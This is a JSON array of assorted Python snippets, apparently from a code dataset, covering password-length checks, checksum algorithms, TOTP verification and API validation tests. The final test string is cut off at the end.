[ "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def test_valid_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def test_valid_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def is_code_valid_checksum(processed_code):\n\n if processed_code.isnumeric():\n list_of_digits = [int(digit) for digit in processed_code]\n else:\n converted_digits = convert_code_to_decimal(processed_code)\n list_of_digits = [int(digit) for digit in converted_digits]\n\n return sum(list_of_digits) > 0 and get_calculated_checksum(list_of_digits) % 11 == 0", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def __len__(self):\n return len(self.code)", "def test_invalid_numeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == allowed_code_length_values_msg", "def test01_password_length(self):\n self.set_complexity(length=13, numeric=0, upper=0, lower=0, special=0)\n\n invalid = (\n \"A\",\n \"Tr0ub4dor&3\",\n \"!!!!!!!!!!!!\",\n \"Password\",\n \"Password123!\",\n \"admin\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"correcthorsebatterystaple\",\n \"abcdefghijklmopqrstuvwxyz\",\n \"12345678901234567890\",\n \"!!!!!!!!!!!!!\" \"Password123!___\",\n )\n self.set_passwords(valid)", "def is_valid_two_digit_char(code: str) -> bool:\n\n return 10 <= int(code) <= 26", "def test_invalid_numeric_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', 
cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == parameter_is_too_long_msg.format('sender_id')", "def test_invalid_nonnumeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('code_length')", "def is_private(code):\n return 4000 <= code <= 4999", "def check_digit(raw_code):\n s = sum(code(char) * 2**index for index, char in enumerate(raw_code))\n return s % 11 % 10", "def is_secure(self):\n return (self.nbits % 8 == 0) and (self.nbits >= params.MINIMUM_KEY_SIZE)", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def __len__(self):\n return self.cli.passwords.len()", "def validate_password(data):\n\n if \"password\" not in data:\n return False\n password = data[\"password\"]\n if len(password) < 4 or len(password) > 16:\n return False\n\n return True", "def passWord(pwd):\n pwdLen = len(pwd)\n if pwdLen < 4:\n raise Exception(\"The password is too short.\")\n if pwdLen > 8:\n raise Exception(\"tHE password is too long\")\n else:\n print('the length of the password is correct.')", "def SecondPart():\n return passwordChecker(data)", "def is_reserved(code):\n return 1000 <= code <= 2999", "def check_valid_fernet(value):\n try:\n decoded = base64.urlsafe_b64decode(value)\n if len(decoded) != 32: return False\n return True\n except binascii.Error:\n return False", "def get_code_length(code):\n ignore = [\"{\", \"}\", \"(\", \")\", \";\", \":\"]\n for ig in ignore:\n code = code.replace(ig, \"\")\n return len([e.strip() for e in code.split(\"\\n\") if (not e.strip() == \"\") and (not e.strip() == u\"'\") and (not e.strip() == u\"u'\")])", "def checksum(code):\n return sum(code) % 256", "def check_verify_code(self):\n r = self.session.get(self.check_url)\n s = r.text\n data = json.loads(s[s.index('{'):-1])\n if data.get('codestring'):\n return data.get('codestring', \"\")\n return \"\"", "def check_password_strength():\r\n\r\n password_regex = re.compile(r'''(\r\n (?=.*[A-Z]{2})\r\n (?=.*[a-z]{3})\r\n (?=.*[/!@#$%^&_*+'\\\"-?.:;<>,])\r\n (?=.*[0-9])\r\n .{8,}\r\n )''', re.VERBOSE)\r\n\r\n get_password(password_regex)", "def verifyHashcode(digest):\n list_str = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\"]\n list_num = [ 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 12 , 13 , 14 , 15 ]\n \n total = 0\n for i2 in range(len(digest)):\n digest_i = digest[i2]\n #print(\"digest_i =\", digest_i)\n \n for i1 in range(16):\n if digest_i == list_str[i1] and i2 != 0:\n total += list_num[i1]\n #print(\"total =\", total)\n #print(\"list_num[i1] =\", list_num[i1])\n continue\n \n #print(\"--- --- ---\")\n \n #print(\"total =\", total)\n \n checknum = total % 16\n #print(\"checknum =\", checknum)\n \n checkstr = list_str[checknum]\n #print(\"checkstr =\", checkstr)\n \n checkorg = digest[0]\n #print(\"checkorg =\", checkorg)\n \n if checkorg == checkstr:\n isValid = True\n else:\n isValid = False\n \n return isValid", "def 
test_valid_luhn(self):\n assert luhn_checksum(\"79927398713\") == 0", "def code_verifier(n_bytes=64):\n verifier = base64.urlsafe_b64encode(os.urandom(n_bytes)).rstrip(b'=')\n # https://tools.ietf.org/html/rfc7636#section-4.1\n # minimum length of 43 characters and a maximum length of 128 characters.\n if len(verifier) < 43:\n raise ValueError(\"Verifier too short. n_bytes must be > 30.\")\n elif len(verifier) > 128:\n raise ValueError(\"Verifier too long. n_bytes must be < 97.\")\n else:\n return verifier", "def pwd_len():\r\n while True:\r\n password_length = input('How much length for password u want ? Minimum length is 6 and Maximum length is 25 : ')\r\n try:\r\n password_length = int(password_length)\r\n if 6 <= password_length <= 25:\r\n break\r\n else:\r\n print('{} is not in range'.format(password_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(password_length))\r\n return password_length", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def calculate_checksum(code):\n\n sum_odd = reduce(sum_chars, code[::2])\n sum_even = reduce(sum_chars, code[1:-1:2])\n check = (sum_even + sum_odd * 3) % 10\n\n if check == 0:\n return 0\n else:\n return 10 - check", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def source_data_key_length_check(source_data_key, algorithm):\n if len(source_data_key.data_key) != algorithm.kdf_input_len:\n raise InvalidDataKeyError(\n \"Invalid Source Data Key length {actual} for algorithm required: {required}\".format(\n actual=len(source_data_key.data_key), required=algorithm.kdf_input_len\n )\n )", "def len12(self, len): # -> None:\n ...", "def validate(msg):\n valid = True\n\n if not msg or len(msg) < 4:\n return False, -1, -1\n\n checksum = msg[-1]\n length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n # try:\n # # here works for pyton 3 only\n # length = int.from_bytes(msg[1:3], byteorder='big', signed=False)\n # except Exception:\n # length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n\n validlen = len(msg[3:-1])\n validsum = 0xFF - ((sum(msg[3:-1])) & 0xFF)\n\n # print('length: ' + str(self.length) + '; ' + str(validlen))\n # print('checksum: ' + str(self.checksum) + '; ' + str(validsum))\n\n # check sanity of computed Length and Checksum with the one in the message\n if (checksum != validsum) or (length != validlen):\n valid = False\n\n return valid, length, checksum", "def symbol_len(password_length):\r\n while True:\r\n symb_length = input('How much symbols you want in password? 
At least 1 : ')\r\n try:\r\n symb_length = int(symb_length)\r\n if 1 <= symb_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(symb_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(symb_length))\r\n return symb_length", "def valid_pass(password):\r\n if len(password) >= 8 and len(password) <= 25 and password != \"forgot\":\r\n return True\r\n\r\n else:\r\n print(\"This is not a vaid password\")\r\n print(\"Password should be between 8 and 25 letters\")\r\n\r\n return False", "def isEncAddress(key):\n\tif re.search('^EAddr38[a-km-zA-HJ-NP-Z0-9]{56}$', key):\n\t\tif checkChecksum(key) is False:\n\t\t\treturn True, 'checksum'\n\t\treturn True, 'good'\n\telse:\n\t\treturn False, 'not valid'", "def check(string):\n if string[4]==\" \" and string[9]==\" \" and string[14]==\" \":\n add = 0\n count = 0\n for i in string:\n if 48<=ord(i)<= 57 or ord(i)==32:\n if 48 <= ord(i)<=57:\n add+=int(i)\n count+=1\n print(add,count)\n #return bool(count == 16)", "def verify(s):\n\t# Remove any spurious characters\n\ts = re.sub(r'[^0-9xX]', '', s).upper().strip()\n\n\tl = len(s)\n\n\tif l==10:\n\t\tif verify_10(s):\n\t\t\treturn s\n\telif l==13:\n\t\tif verify_13(s):\n\t\t\treturn s\n\n\t# It's not the right length to be an ISBN\n\treturn False", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def valid_serial_key(serial_key):\n parts = serial_key.split('-')\n if len(parts) != 5:\n return False\n\n for part in parts:\n if not re.match('[A-Z0-9]{5}$', part):\n return False\n\n return True", "def test_password_length(self):\n response = self.client().post('/api/v1/auth/signup', data=self.user_data_4)\n self.assertEqual(response.status_code, 400)\n # return result in json format\n result = json.loads(response.data.decode())\n self.assertEqual(\n result[\"message\"], \"Password should not be less than four characters.\")", "def valid_barcode(s):\n # implement this function!\n odd_digits = 0\n even_digits = 0\n result = 0\n for i in range(len(s) - 1):\n if i % 2 == 0:\n odd_digits += int(s[i])\n else:\n even_digits += int(s[i])\n result = (3 * odd_digits + even_digits) % 10\n if result != 0:\n result = 10 - result\n\n try:\n if int(s[-1]) == result and len(s) == 12:\n return True\n else:\n return False\n except IndexError:\n return False", "def verify_code(email, val):\r\n # TODO: is this the right string?\r\n verification_string = email.lower() + '|' + val\r\n return hashlib.md5(verification_string).hexdigest()", "def test_password_strength_validator(self):\n self.assertIsNone(validate_password_strength('abcd123'))", "def test_invalid_luhn(self):\n assert luhn_checksum(\"79927398714\") != 0", "def _validate_instruction_code_23E(self, val):\n validate_instruction_code(val)\n return val", "def test_allowed_chars(self):\n hash_val = self.reverse_hash.get_hash('123')\n self.assertEqual(hash_val['error'], 'allowed chars {}'.format(self.reverse_hash.letters))", "def validate(info):\n\n\tif info == \"\": \n\t\treturn False\n\telse:\n\t\tif len(info) < 
5 or len(info) > 32:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True", "def is_valid_control_number(id_code: str) -> bool:\n sum = 1 * int(id_code[:1]) + 2 * int(id_code[1:2]) + 3 * int(id_code[2:3]) + 4 * int(id_code[3:4]) + 5 * \\\n int(id_code[4:5]) + 6 * int(id_code[5:6]) + 7 * int(id_code[6:7]) + 8 * int(id_code[7:8]) + 9 *\\\n int(id_code[8:9]) + 1 * int(id_code[9:10])\n control_number = sum % 11\n if int(control_number) == int(id_code[10:11]):\n return True\n elif int(control_number) == 10:\n sum = 3 * int(id_code[:1]) + 4 * int(id_code[1:2]) + 5 * int(id_code[2:3]) + 6 * int(id_code[3:4]) + 7 * \\\n int(id_code[4:5]) + 8 * int(id_code[5:6]) + 9 * int(id_code[6:7]) + 1 * int(id_code[7:8]) + 2 * \\\n int(id_code[8:9]) + 3 * int(id_code[9:10])\n control_number = sum % 11\n if control_number == int(id_code[10:11]):\n return True\n elif control_number == 10:\n if int(id_code[10:11]) == 0:\n return True\n else:\n return False\n else:\n return False", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def cleanCode(si):\n while len(si) < 4: si += 'x' # fill out the length of the code string\n so = \"\"\n for ii in range(4):\n if si[ii] in \"1234567890abcdefxyABCDEFX\": # check if this is a valid character\n# [0-9a-fA-FxyX]\n so += si[ii] # valid character\n else:\n so += \"xxxx\" # fill the string with 'x'\n ii = 4 # hit a bad one, stop checking string\n return so[:4] # clean code is 4 characters long", "def ospf_lsa_checksum(lsa):\n return fletcher16_checkbytes(b\"\\x00\\x00\" + lsa[2:], 16) # leave out age", "def create_secret_code():\n characters = string.ascii_uppercase + string.digits\n size = 6\n return ''.join(random.choice(characters) for _ in range(size))", "def validate_code(request):\n user_id = api.keystone.get_user_id(request)\n print \"USER CHECK\"\n print user_id\n user = api.keystone.user_get(request, user_id)\n user_auth_code = request.GET.get('auth_code', None)\n secret = request.GET.get('secret', None)\n\n #Generate a code form our side using algorithm and use it to validate\n generated_code = api.keystone.generate_totp(secret)\n\n print secret\n print user_auth_code\n print generated_code\n print 'entering code comparison'\n \n data = {}\n extra = {}\n\n #Code comparison\n if user_auth_code == generated_code:\n data['totp_authenticated'] = True\n extra['two_factor_enabled'] = True\n\textra['secret_key'] = secret\n api.keystone.enable_2fa(request, user, **extra)\n else:\n \tprint 'falseeeeee'\n data['totp_authenticated'] = False\n return JsonResponse(data)", "def _get_checksum(code: str) -> int:\r\n total = 0\r\n\r\n for index, digit in enumerate(code):\r\n digit = int(digit)\r\n if (index + 1) % 2 != 0:\r\n digit *= 2\r\n if digit > 9:\r\n digit -= 9\r\n total += digit\r\n\r\n checksum = 10 - total % 10\r\n\r\n return checksum if checksum != 10 else 0", "def check_ean(eancode):\n if not eancode:\n return True\n if len(eancode) <> 13:\n return False\n try:\n int(eancode)\n except:\n return False\n return ean_checksum(eancode) == int(eancode[-1])", "def test_generate_secret(self):\n random_secret = ef_password.generate_secret(24)\n self.assertEqual(len(random_secret), 24)\n assert not 
set('[~!@#$%^&*()_+{}\":;\\']+$').intersection(random_secret)", "def validate_uuid(self, uuid_to_check):\r\n if re.fullmatch(BASE62_REGEX, uuid_to_check):\r\n return 20 <= len(uuid_to_check) <= 22\r\n else:\r\n return False", "def test_luhn_checksum(self):\n check_digit = calculate_luhn(\"7992739871\")\n assert check_digit == 3", "def checkZipCode(data):\n if len(data) < 5:\n while len(data) < 5:\n data = '0' + data\n elif len(data) > 5:\n data = data[0:4]\n # print(data)\n return (data)", "def verify(self, k, code, counter = -1, window=30, allowed_steps=2):\n # if counter == -1:\n # verifycode = self.hotp(k, counter)\n # else:\n for i in range(0, allowed_steps + 1):\n c = hex(int((time.time() - i * window) // window))[2:]\n while len(c) < 16:\n c = \"0\" + c\n\n verifycode = self.totp(k, c, window=window)\n if code == verifycode:\n return True\n return False", "def test_random_password():\n output = sh.random_password()\n assert isinstance(output, str) is True\n assert len(output) == 16", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def check(s1):\n chars = [0] * 128\n for c in s1:\n chars[ord(c)]+=1\n\n counter = 0\n for i in range(len(chars)):\n if chars[i] %2 != 0:\n counter+=1\n \n return counter <= 1", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def test_invalid_numeric_code_length_format(self, cred, language):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'lg': language})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('lg')", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def test_long(self):\n s = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ 